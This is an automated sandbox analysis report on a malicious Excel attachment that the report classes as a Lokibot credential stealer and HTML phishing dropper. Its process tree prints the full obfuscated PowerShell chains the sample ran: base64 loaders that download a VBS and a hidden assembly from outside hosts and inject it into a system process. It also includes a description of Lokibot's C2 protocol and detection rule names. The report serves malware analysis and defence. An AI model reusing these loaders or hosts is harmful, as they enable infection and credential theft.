Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.2407010.xls

Overview

General Information

Sample name:PO.2407010.xls
Analysis ID:1545131
MD5:28795274503d8d74d85408746a7d1def
SHA1:151fb154f9c1eb44528b2b221279e1a242f9c4cc
SHA256:d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683
Tags:xlsuser-abuse_ch
Infos:

Detection

HTMLPhisher, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3268 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3572 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3656 cmdline: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3856 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7224.tmp" "c:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3956 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 4004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 4092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_regbrowsers.exe (PID: 3824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: 04AA198D72229AEED129DC20201BF030)
    • mshta.exe (PID: 364 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 928 cmdline: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 2880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3436 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithmegood[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 4092JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 4092INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x189d:$b2: ::FromBase64String(
        • 0x1eb6:$b2: ::FromBase64String(
        • 0xf3f1:$b2: ::FromBase64String(
        • 0x2648b:$b2: ::FromBase64String(
        • 0x2f7d9:$b2: ::FromBase64String(
        • 0x40400:$b2: ::FromBase64String(
        • 0x40b62:$b2: ::FromBase64String(
        • 0x5b00e:$b2: ::FromBase64String(
        • 0x5bed1:$b2: ::FromBase64String(
        • 0x5d636:$b2: ::FromBase64String(
        • 0x7abdd:$b2: ::FromBase64String(
        • 0x7b227:$b2: ::FromBase64String(
        • 0x8b0d6:$b2: ::FromBase64String(
        • 0x8b721:$b2: ::FromBase64String(
        • 0x8c70d:$b2: ::FromBase64String(
        • 0x164e:$b3: ::UTF8.GetString(
